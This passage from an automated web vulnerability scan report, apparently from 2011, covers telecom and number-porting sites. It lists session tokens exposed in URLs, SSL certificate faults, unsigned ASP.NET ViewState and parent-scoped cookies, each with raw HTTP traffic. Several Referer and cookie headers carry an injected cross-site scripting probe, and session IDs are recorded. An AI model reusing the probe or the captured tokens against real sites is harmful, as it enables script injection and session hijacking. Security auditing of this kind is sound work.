Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tis.org/

Response

HTTP/1.1 200 OK
Cartoon: : aaimage1-new
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3880635792"
Last-Modified: Tue, 03 May 2011 19:40:02 GMT
Content-Length: 16625
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:08 GMT
Connection: close

// get param value from url
function getParam(name) {
var match = new RegExp(name + "=([^&]+)","i").exec(location.search);
if (match==null)
match = new RegExp(name + "=(.+)","i").e
...[SNIP]...
< google_categories.length; i++) {
popularCategories += '<a href="/?domain_name=' + google_afd_response.request.s +
'&q=' + encodeURIComponent(google_categories[i].term) +
'&token=' + google_categories[i].token + '">' + google_categories[i].term + '</a>
...[SNIP]...

9.4. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&hostname=www.redskye911.com&location=%2Fe911_products%2F&url=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&sessionID=1305162436078.62285&fpc=a449df2-12fe1be4def-5e2048d0-1&ts1305162438995.0&r_sessionID=&hash_flag=&shr=&count=1

Request

GET /pview?event=pview&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&hostname=www.redskye911.com&location=%2Fe911_products%2F&url=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&sessionID=1305162436078.62285&fpc=a449df2-12fe1be4def-5e2048d0-1&ts1305162438995.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 01:07:19 GMT
Connection: keep-alive

9.5. https://lnp.activationnow.com/lnp/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://lnp.activationnow.com
Path:	/lnp/

Issue detail

The response contains the following links that appear to contain session tokens:

http://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395

Request

Response

9.6. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://lnp.activationnow.com
Path:	/lnp/jsp/logon/login.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Request

Response

9.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.anpisolutions.com%2Fwholesale-voice-and-data-services%2Fsignaling-network-and-database-services%2Fgateway-services%2F&callback=_xdc_._xjyf04&token=74970

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.anpisolutions.com%2Fwholesale-voice-and-data-services%2Fsignaling-network-and-database-services%2Fgateway-services%2F&callback=_xdc_._xjyf04&token=74970 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 12 May 2011 00:46:24 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._xjyf04 && _xdc_._xjyf04( [1] )

9.8. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://support.sprint.com
Path:	/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The response contains the following links that appear to contain session tokens:

http://support.sprint.com/support/servicepage;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4
http://support.sprint.com/support;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...
<li><a href="/support;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4">Support</a>
...[SNIP]...
<li><a href="/support/servicepage;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4">

                                           Services
                                   </a>
...[SNIP]...

9.9. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

9.10. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/logon/logonstore.html?Time=-1775957737&SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

9.11. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

9.12. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=13155&Template=NANPA Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775933308&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3386&Template=NANPA Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775933308&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3387&Template=NANPA Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775933308&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=9990&Template=NANPA Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775933308&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store_Front&Time=-1775933308&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s

Request

Response

10. SSL certificate previous next
There are 6 instances of this issue:

https://extranet.connexon.com/
https://gvnwlnp.com/
https://lnp.activationnow.com/
https://catalyst.fastcatalog.net/
https://support.connexon.com/
https://www.nationalnanpa.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

10.1. https://extranet.connexon.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://extranet.connexon.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	support.connexon.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Sep 23 09:04:22 CDT 2010
Valid to:	Fri Aug 19 09:36:18 CDT 2011

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

10.2. https://gvnwlnp.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://gvnwlnp.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	www.gvnwlnp.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Oct 01 16:59:32 CDT 2009
Valid to:	Sat Oct 01 16:17:56 CDT 2011

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

10.3. https://lnp.activationnow.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	lnp.activationnow.com
Issued by:	lnp.activationnow.com
Valid from:	Mon Aug 09 12:46:36 CDT 2004
Valid to:	Sun Sep 08 23:00:00 CDT 2024

10.4. https://catalyst.fastcatalog.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://catalyst.fastcatalog.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.fastcatalog.net
Issued by:	GeoTrust SSL CA
Valid from:	Tue Oct 12 22:01:03 CDT 2010
Valid to:	Thu Oct 15 06:12:18 CDT 2015

Certificate chain #1

Issued to:	GeoTrust SSL CA
Issued by:	GeoTrust Global CA
Valid from:	Fri Feb 19 16:39:26 CST 2010
Valid to:	Tue Feb 18 16:39:26 CST 2020

Certificate chain #2

Issued to:	GeoTrust Global CA
Issued by:	GeoTrust Global CA
Valid from:	Mon May 20 23:00:00 CDT 2002
Valid to:	Fri May 20 23:00:00 CDT 2022

10.5. https://support.connexon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	support.connexon.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Thu Sep 23 09:04:22 CDT 2010
Valid to:	Fri Aug 19 09:36:18 CDT 2011

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

10.6. https://www.nationalnanpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.nationalnanpa.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Wed Jan 27 00:46:28 CST 2010
Valid to:	Sat Jan 28 15:44:07 CST 2012

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

11. ASP.NET ViewState without MAC enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gvnwlnp.com
Path:	/login.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /login.aspx HTTP/1.1
Host: gvnwlnp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf0wts55rdy2k0bdceo0lu45

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 00:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
LNP Login
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwNTQyNzQyMzMPZBYCZg9kFgICAw9kFgICBQ9kFgICAQ9kFgJmD2QWAgINDxAPFgIeB0NoZWNrZWRoZGRkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUrY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRMb2dpbjEkUmVtZW1iZXJNZQ==" />
...[SNIP]...

12. Cookie scoped to parent domain previous next
There are 13 instances of this issue:

http://www.secviz.org/node/89
http://ad.doubleclick.net/clk
http://b.scorecardresearch.com/b
http://id.google.com/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif
http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612
http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294
http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139
http://nextelonline.nextel.com/tl/set_tl.html
http://pixel.quantserve.com/pixel
http://shop2.sprint.com/en/support/faq/wlnp.shtml
http://www.linkedin.com/companyInsider
http://www.vonage.com/lp/US/afflpdc/
http://www.vonage.com/lp/US/afflpdc/index.php

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://www.secviz.org/node/89 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.2. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225879025;40290099;m HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vonage.com/lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL
Set-Cookie: id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 00:50:28 GMT
Server: GFE/2.0
Content-Type: text/html

12.3. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=662363118&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.redskye911.com%252Fe911_products%252F%26jsref%3Dhttp%253A%252F%252Fwww.redskye911.com%252F%26rnd%3D1305162438995&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 01:07:20 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.4. http://id.google.com/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

